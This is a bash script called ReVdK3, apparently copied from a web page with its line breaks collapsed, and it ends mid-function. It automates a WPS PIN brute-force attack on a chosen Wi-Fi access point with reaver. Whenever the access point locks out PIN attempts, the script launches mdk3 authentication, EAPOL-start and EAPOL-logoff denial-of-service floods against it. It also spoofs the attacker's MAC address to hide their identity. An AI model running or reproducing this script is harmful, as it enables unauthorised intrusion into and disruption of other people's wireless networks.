#!/bin/bash declare MAC; declare PIN_TIME; declare - TopicsExpress


#!/bin/bash declare MAC; declare PIN_TIME; declare WLAN; declare MON1; declare MON2; declare MON3; declare PHY_OF_WLAN_1; declare NO_OF_MONITOR_INTERFACES_CHECK; declare MONITOR_INTERFACES; declare STOP_INTERFACE; declare VARIABLE; declare CHANNEL; declare DISTANCE_BETWEEN_PINS; declare TIMEOUT; declare ESSID; declare SATISFIED_OPTION=r; declare REAVER_COMMAND_LINE; declare MDK3_MAIN_MENU_OPTION; declare RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS; declare RETURN_OPTION_FOR_EAPOL_START_FLOOD; declare EAPOL_START_FLOOD_COMMAND; declare AUTH_DOS_FLOOD_COMMAND; declare RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD; declare EAPOL_LOG_OFF_FLOOD_COMMAND; declare VARIABLE_CHECK_FOR_RATE_LIMITING; declare TARGET_STATION; declare MDK3_KILLALL_1 declare AIREPLAY_KILLALL; declare SUCCESSIVE_EAPOL_FAILURES; declare AIREPLAY_RESET; declare MONITOR_INTERFACES_CHECK; #WELCOM MESSAGE echo -e \e[36m\e[1m###########################\e[0m; echo -e \e[36m\e[1m# WELCOME TO ReVdK3 Script# \e[35m\e[1mC\e[92m\e[1mR\e[91m\e[1mE\e[34m\e[1mA\e[33m\e[1mT\e[96m\e[1mE\e[35m\e[1mD \e[92m\e[1mB\e[35m\e[1mY\e[0m : \e[35m\e[1mR\e[92m\e[1mE\e[91m\e[1mP\e[34m\e[1mZ\e[33m\e[1mE\e[96m\e[1mR\e[35m\e[1mO\e[92m\e[1mW\e[91m\e[1mO\e[34m\e[1mR\e[33m\e[1mL\e[96m\e[1mD\e[35m\e[1m\e[0m; echo -e \e[36m\e[1m###########################\e[0m; echo -e \e[36m\e[1m#####################################################################\e[0m; echo -e \e[36m\e[1m# This Script allows you to use reaver and an mdk3 flood attack that#\e[0m; echo -e \e[36m\e[1m# you choose #\e[0m; echo -e \e[36m\e[1m#####################################################################\e[0m; echo -e \e[36m\e[1m# This Script was created for Access Points that locks up for long #\e[0m; echo -e \e[36m\e[1m# periods of time. It works by starting reaver and continously #\e[0m; echo -e \e[36m\e[1m# detect when reaver is rate limiting pins, once reaver detects #\e[0m; echo -e \e[36m\e[1m# the AP is rate limiting pins, it starts mdk3 attacks. mdk3 attacks#\e[0m; echo -e \e[36m\e[1m# are killed once reaver detects that the AP has unlocked itself ! #\e[0m; echo -e \e[36m\e[1m# The prcoess goes on... #\e[0m; echo -e \e[36m\e[1m#####################################################################\e[0m; echo ; echo -e \e[37m\e[44m\e[1m ReVdK3.sh-r1 (Revision 1)- see README\e[0m; echo ; echo -e \e[37m\e[44m\e[1mThanks to N1ksan for some useful ideas in this revision!\e[0m; echo ; echo -e \e[36m\e[40m\e[1m******************************************************\e[0m; echo -e \e[36m\e[40m\e[1m* Welcome: I need to verify your wireless interface *\e[0m; echo -e \e[36m\e[40m\e[1m******************************************************\e[0m; echo ; read -p Which wireless interface you will be using? e.g wlan1, wlan2 etc: WLAN; EXISTENCE_OF_WLAN=`airmon-ng|grep $WLAN|cut -f1`; while [ -z $WLAN -o $EXISTENCE_OF_WLAN != $WLAN ]; do echo -e \e[31m\e[1mYou input a wireless interface that doesnt exist!\e[0m; echo ; read -p Which wireless interface you will be using? e.g wlan1, wlan2 etc: WLAN; EXISTENCE_OF_WLAN=`airmon-ng|grep $WLAN|cut -f1`; done PHY_OF_WLAN_1=`airmon-ng|grep $WLAN|cut -d -f4`; NO_OF_MONITOR_INTERFACES_CHECK=`airmon-ng|grep -F $PHY_OF_WLAN_1|wc -l`; MONITOR_INTERFACES=`airmon-ng|grep -F $PHY_OF_WLAN_1|cut -f1|tr -s [:space:] `; echo -e \e[36m\e[1mKilling any existing monitor interface(s) on $WLAN\e[0m; if [ $NO_OF_MONITOR_INTERFACES_CHECK != 1 ]; then for STOP_INTERFACE in $MONITOR_INTERFACES; do if [ $STOP_INTERFACE != $WLAN ]; then airmon-ng stop $STOP_INTERFACE > /dev/null; fi done fi echo -e \e[36m\e[1mSuccessful!\e[0m; echo -e \e[36m\e[1mStarting three new monitor modes...\e[0m; MON1=`airmon-ng start $WLAN|grep -F (monitor mode enabled on |tr -s [:space:] |cut -d -f6|tr -d )` MON2=`airmon-ng start $WLAN|grep -F (monitor mode enabled on |tr -s [:space:] |cut -d -f6|tr -d )` MON3=`airmon-ng start $WLAN|grep -F (monitor mode enabled on |tr -s [:space:] |cut -d -f6|tr -d )` echo Successful! trap echo -e \n\e[36m\e[1mCleaning up all temporary files created by this script..good house keeping...ensuring all processes are killed!\e[31m\e[0m; killall mdk3 2> /dev/null; killall reaver 2> /dev/null; killall tail 2> /dev/null; rm -f /etc/reaver_tmp.txt 2> /dev/null; airmon-ng stop $MON1 > /dev/null; airmon-ng stop $MON2 > /dev/null; airmon-ng stop $MON3 > /dev/null; killall aireplay-ng 2> /dev/null; rm -f /etc/aireplay_tmp.txt 2> /dev/null; killall -9 ReVdK3-r1.sh > /dev/null; SIGINT SIGHUP clear while [ $SATISFIED_OPTION = r ]; do clear echo ; echo -e \e[36m\e[40m\e[1m***********************************\e[0m; echo -e \e[36m\e[40m\e[1m*Welcome to Reavers configuration*\e[0m; echo -e \e[36m\e[40m\e[1m***********************************\e[0m; echo ; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx MAC ADDRESS OF AP x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; read -p What is the mac address of the access point you are targeting?: MAC; while [ -z $MAC ]; do echo -e \e[31m\e[1mYou need to input the targets MAC address\e[0m; echo ; read -p What is the mac address of the access point you are targeting?: MAC; done echo MAC address saved...; echo ; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx ESSID OF AP x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; read -p What is the essid of the access point you are targeting: ESSID; while [ -z $ESSID ]; do echo -e \e[31m\e[1mYou need to input the targets ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m; echo ; read -p What is the essid of the access point you are targeting: ESSID; done echo ESSID saved...; echo -e \e[36m\e[1mI am hiding your identity by changing your mac\e[0m; sleep 2; ifconfig $WLAN down; ifconfig $WLAN down; ifconfig $WLAN down; ifconfig $MON1 down; ifconfig $MON1 down; ifconfig $MON2 down; ifconfig $MON2 down; ifconfig $MON3 down; ifconfig $MON3 down; macchanger -m 78:03:40:02:94:8f $WLAN> /dev/null; macchanger -m 78:03:40:02:94:8f $MON1> /dev/null; macchanger -m 78:03:40:02:94:8f $MON2> /dev/null; macchanger -m 78:03:40:02:94:8f $MON3> /dev/null; ifconfig $MON1 up; ifconfig $MON1 up; ifconfig $MON2 up; ifconfig $MON2 up; ifconfig $MON3 up; ifconfig $MON3 up; echo; echo ; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx Reavers Options x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx x\e[0m; echo -e \e[36m\e[40m\e[1mx[1] Channel Option (-c) x\e[0m; echo -e \e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot! x\e[0m; echo -e \e[36m\e[40m\e[1mx............................................................................x\e[0m; echo -e \e[36m\e[40m\e[1mx[2] Timeout Option (-t) x\e[0m; echo -e \e[36m\e[40m\e[1mx(Reavers to wait for a message from the AP) x\e[0m; echo -e \e[36m\e[40m\e[1mx............................................................................x\e[0m; echo -e \e[36m\e[40m\e[1mx[3] Reavers time between pin (-d) x\e[0m; echo -e \e[36m\e[40m\e[1mx x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; #CHANNEL CHAIN echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx CHANNEL SWITCH x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; read -p What channel you want reaver listen on (-c flag), or press ENTER to use default reavers option: CHANNEL; while [[ $CHANNEL != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|) ]]; do echo -e \e[31m\e[1mYou need to input a channel number between 1-16\e[0m; echo ; read -p What channel you want reaver listen on (-c flag), or press ENTER to use default reavers option: CHANNEL; done #DISTANCE BETWEEN PIN ATTEMPTS CHAIN echo ; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx PIN DELAY SWITCH x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; read -p How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER : DISTANCE_BETWEEN_PINS while [[ $DISTANCE_BETWEEN_PINS = [-A-Za-qs-z`~@#$%^&*()_+=|[]{}\;:,./? *0]* ]]; do echo -e \e[31m\e[1mYou need to choose a postive number!\e[0m; echo ; read -p How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER : DISTANCE_BETWEEN_PINS done #TIME OUT CHAIN echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx TIMEOUT SWITCH x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; read -p How much time in seconds for reaver to timeout if the AP doesnt respond? (-t flag), if you want to use default option press ENTER: TIMEOUT; while [[ $TIMEOUT = [-A-Za-qs-z`~@#$%^&*()_+=|[]{}\;:,./? *0]* ]]; do echo -e \e[31m\e[1mYou need to choose a postive number!\e[0m; echo ; read -p How much time in seconds for reaver to timeout if the AP doesnt respond? (-t flag), if you want to use default option press ENTER: TIMEOUT; echo ; done echo ; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx REAVER COMMAND LINE YOU HAVE CHOOSEN x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; if [ -z $CHANNEL -a -n $DISTANCE_BETWEEN_PINS -a $TIMEOUT ]; then echo reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv; REAVER_COMMAND_LINE=`echo reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv`; echo ; fi if [ -z $DISTANCE_BETWEEN_PINS -a -n $CHANNEL -a -n $TIMEOUT ]; then echo reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv; REAVER_COMMAND_LINE=`echo reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv`; echo; fi if [ -z $TIMEOUT -a -n $DISTANCE_BETWEEN_PINS -a -n $CHANNEL ]; then echo reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv; REAVER_COMMAND_LINE=`echo reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv`; echo ; fi if [ -z $CHANNEL -a -z $DISTANCE_BETWEEN_PINS -a -n $TIMEOUT ]; then echo reaver -i $MON1 -b $MAC -S -t $TIMEOUT -l 10 -N -vv; REAVER_COMMAND_LINE=`echo reaver -i $MON1 -b $MAC -S -t $TIMEOUT -l 10 -N -vv`; echo ; fi if [ -z $CHANNEL -a -z $TIMEOUT -a -n $DISTANCE_BETWEEN_PINS ]; then echo reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv; REAVER_COMMAND_LINE=`echo reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv`; echo ; fi if [ -z $DISTANCE_BETWEEN_PINS -a -z $TIMEOUT -a -n $CHANNEL ]; then echo reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv; REAVER_COMMAND_LINE=`echo reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv`; echo ; fi if [ -z $DISTANCE_BETWEEN_PINS -a -z $TIMEOUT -a -z $CHANNEL ]; then echo reaver -i $MON1 -b $MAC -S -l 10 -N -vv; REAVER_COMMAND_LINE=`echo reaver -i $MON1 -b $MAC -S -l 10 -N -vv`; fi if [ -n $DISTANCE_BETWEEN_PINS -a -n $TIMEOUT -a -n $CHANNEL ]; then echo reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv; REAVER_COMMAND_LINE=`echo reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv`; echo ; fi echo ; read -p Are you satisified with this configuration? if not, input r and you will be returned to Reavers Configuration Wizard: SATISFIED_OPTION; done if [ -e /etc/reaver_tmp.txt ]; then rm -f /etc/reaver_tmp.txt fi if [ -e /etc/aireplay_tmp.txt ]; then rm -f /etc/aireplay_tmp.txt fi clear function MDK3_MAIN_MENU { echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx WELCOME TO MDK3 FLOOD ATTACK MAIN MENU x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx[1] Authentication DoS Flood Attack x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx[2] EAPOL Start Flood Attack x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx[3] EAPOL log off Flood Attack x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx NOTE:This script will stop reaver once it detects the AP is locked and x\e[0m; echo -e \e[36m\e[40m\e[1mx then flood the Access Point for the time period you choose after flooding x\e[0m; echo -e \e[36m\e[40m\e[1mx reaver resumes.This process goes on until reaver finds the correct pin! x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; read -p Which Attack You Prefer to carry out(Input No.)?: MDK3_MAIN_MENU_OPTION; while [[ $MDK3_MAIN_MENU_OPTION != @(1|2|3) ]]; do echo -e \e[31m\e[1mIncorrect Option choosen, Please choose an option from the Main Menu!\e[0m; echo ; read -p Which Attack You Prefer to carry out(Input No.)?: MDK3_MAIN_MENU_OPTION; done; if [ $MDK3_MAIN_MENU_OPTION = 1 ]; then clear AUTH_DOS_MAIN_MENU; fi if [ $MDK3_MAIN_MENU_OPTION = 2 ]; then clear EAPOL_START_FLOOD_ATTACK_MAIN_MENU; fi if [ $MDK3_MAIN_MENU_OPTION = 3 ]; then clear EAPOL_LOG_OFF_ATTACK_MAIN_MENU; fi } ########################################################################### function AUTH_DOS_MAIN_MENU { echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx Authentication DoS Flood Attack x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous fake clients x\e[0m; echo -e \e[36m\e[40m\e[1mxuntil reaver detects that the AP is unlocked. The attack will restart when x\e[0m; echo -e \e[36m\e[40m\e[1mxthe AP has locked itself again...the process goes on! x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mxThe Authentication DoS Flood Command line below will be used x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; AUTH_DOS_FLOOD_COMMAND=`echo -e \e[36m\e[1mmdk3 $MON1 a -a $MAC -s 200 & mdk3 $MON2 a -a $MAC -s 200 & mdk3 $MON3 a -a $MAC -s 200\e[0m`; echo $AUTH_DOS_FLOOD_COMMAND; echo ; read -p To start the attack press ENTER to proceed or input r to return to mdk3 main menu: RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS if [ $RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS = r ]; then clear MDK3_MAIN_MENU fi echo -e \e[36m\e[1mStarting MDK3 Auth Flood Attack...\e[0m sleep 3; clear REAVER & AIREPLAY & MDK3 & TAIL; } ########################################################################### function EAPOL_START_FLOOD_ATTACK_MAIN_MENU { echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx EAPOL Start Flood Attack x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL start x\e[0m; echo -e \e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will x\e[0m; echo -e \e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on! x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mxThe Authentication EAPOL Start Flood Attack Command line below will be usedx\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; EAPOL_START_FLOOD_COMMAND=`echo -e \e[36m\e[1mmdk3 $MON1 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 200\e[0m`; echo $EAPOL_START_FLOOD_COMMAND; read -p To start the attack press ENTER to proceed or input r to return to mdk3 main menu: RETURN_OPTION_FOR_EAPOL_START_FLOOD; if [ $RETURN_OPTION_FOR_EAPOL_START_FLOOD = r ]; then clear MDK3_MAIN_MENU; fi echo -e \e[36m\e[1mStarting MDK3 EAPOL Start Flood Attack...\e[0m; sleep 3; clear REAVER & AIREPLAY & MDK3 & TAIL; } ########################################################################### function EAPOL_LOG_OFF_ATTACK_MAIN_MENU { echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mx EAPOL Log Off Flood Attack x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL log off x\e[0m; echo -e \e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will x\e[0m; echo -e \e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on! x\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo; read -p What is the MAC address of one of the clients connected?: TARGET_STATION while [[ $TARGET_STATION = @(|) ]]; do echo -e \e[31m\e[1mYou cannot leave this field blank\e[0m; echo read -p What is the MAC address of one of the client connected?: TARGET_STATION done echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo -e \e[36m\e[40m\e[1mxThe Authentication EAPOL Log Off Flood Attack Command line below will be usedx\e[0m; echo -e \e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m; echo ; EAPOL_LOG_OFF_FLOOD_COMMAND=`echo -e \e[36m\e[1mmdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION\e[0m`; echo $EAPOL_LOG_OFF_FLOOD_COMMAND; read -p To start the attack press ENTER to proceed or input r to return to mdk3 main menu: RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD; if [ $RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD = r ]; then clear MDK3_MAIN_MENU; fi echo -e \e[36m\e[1mStarting MDK3 EAPOL Log Off Flood Attack...\e[0m; sleep 3; clear; REAVER & AIREPLAY & MDK3 & TAIL; } ########################################################################## function REAVER { echo y|$REAVER_COMMAND_LINE|tee -a /etc/reaver_tmp.txt > /dev/null & aireplay-ng $MON1 -1 100000000 -a $MAC -e $ESSID -Q -q3 2> /dev/null| tee /etc/aireplay_tmp.txt > /dev/null; } ########################################################################### function MDK3 { while :; do MDK3_KILLALL_1=`ps -A|grep mdk3` VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`; SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F [!] WARNING: 25 successive start failures`; while [ $VARIABLE_CHECK_FOR_RATE_LIMITING = [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking -a -z $MDK3_KILLALL_1 ]; do if [ $MDK3_MAIN_MENU_OPTION = 1 ]; then gnome-terminal --geometry=1x2 --title=Authentication Dos Flood Attack in progess -e mdk3 $MON1 a -a $MAC -s 200 & gnome-terminal --geometry=1x2 --title=Authentication Dos Flood Attack in progess -e mdk3 $MON2 a -a $MAC -s 200 & gnome-terminal -e --geometry=1x2 --title=Authentication Dos Flood Attack in progess -e mdk3 $MON3 a -a $MAC -s 200; sleep 0.5; fi if [ $MDK3_MAIN_MENU_OPTION = 2 ]; then gnome-terminal --geometry=1x2 --title=EAPOL Start Flood Attack in progress -e mdk3 $MON1 x 0 -t $MAC -n $ESSID -s 200 & gnome-terminal --geometry=1x2 --title=EAPOL Start Flood Attack in progress -e mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 200 & gnome-terminal --geometry=1x2 --title=EAPOL Start Flood Attack in progress -e mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 200; sleep 0.5; fi if [ $MDK3_MAIN_MENU_OPTION = 3 ]; then gnome-terminal --geometry=1x2 --title=EAPOL log off Flood Attack in progress -e mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION & gnome-terminal --geometry=1x2 --title=EAPOL log off Flood Attack in progress -e mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION & gnome-terminal --geometry=1x2 --title=EAPOL log off Flood Attack in progress -e mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION; sleep 0.5; fi MDK3_KILLALL_1=`ps -A|grep mdk3` VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`; SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F [!] WARNING: 25 successive start failures`; done ### while [ $SUCCESSIVE_EAPOL_FAILURES = [!] WARNING: 25 successive start failures -a -z $MDK3_KILLALL_1 ]; do killall -STOP reaver echo -e \e[36m\e[1mReaver detected 25 successive eapol failures!, pausing reaver and running flood attacks for 60 second!\e[0m >> /etc/reaver_tmp.txt ; if [ $MDK3_MAIN_MENU_OPTION = 1 ]; then gnome-terminal --geometry=1x2 --title=Authentication Dos Flood Attack in progess -e timeout 60 mdk3 $MON1 a -a $MAC -s 200 & gnome-terminal --geometry=1x2 --title=Authentication Dos Flood Attack in progess -e timeout 60 mdk3 $MON2 a -a $MAC -s 200 & gnome-terminal -e --geometry=1x2 --title=Authentication Dos Flood Attack in progess -e timeout 60 mdk3 $MON3 a -a $MAC -s 200; sleep 60; fi if [ $MDK3_MAIN_MENU_OPTION = 2 ]; then gnome-terminal --geometry=1x2 --title=EAPOL Start Flood Attack in progress -e timeout 60 mdk3 $MON1 x 0 -t $MAC -n $ESSID -s 200 & gnome-terminal --geometry=1x2 --title=EAPOL Start Flood Attack in progress -e timeout 60 mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 200 & gnome-terminal --geometry=1x2 --title=EAPOL Start Flood Attack in progress -e timeout 60 mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 200; sleep 60; fi if [ $MDK3_MAIN_MENU_OPTION = 3 ]; then gnome-terminal --geometry=1x2 --title=EAPOL log off Flood Attack in progress -e timeout 60 mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION & gnome-terminal --geometry=1x2 --title=EAPOL log off Flood Attack in progress -e timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION & gnome-terminal --geometry=1x2 --title=EAPOL log off Flood Attack in progress -e timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION; sleep 60; fi killall -CONT reaver; VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null` SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F [!] WARNING: 25 successive start failures`; MDK3_KILLALL_1=`ps -A|grep mdk3` done ### VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null` SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F [!] WARNING: 25 successive start failures`; if [ $VARIABLE_CHECK_FOR_RATE_LIMITING != [!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking -o $SUCCESSIVE_EAPOL_FAILURES = [!] WARNING: 25 successive start failures ]; then killall mdk3 2> /dev/null fi done } ########################################################################### function TAIL { while :; do clear timeout 10 tail -n 100 -f /etc/reaver_tmp.txt 2> /dev/null; clear AIREPLAY_RESET=`cat /etc/aireplay_tmp.txt|grep -w Switching to shared key authentication` if [ -n $AIREPLAY_RESET ]; then killall aireplay-ng fi timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null done } ########################################################################### function AIREPLAY { while :; do sleep 0.5; aireplay-ng $MON1 -1 100000000 -a $MAC -e $ESSID -Q -q3 2> /dev/null| 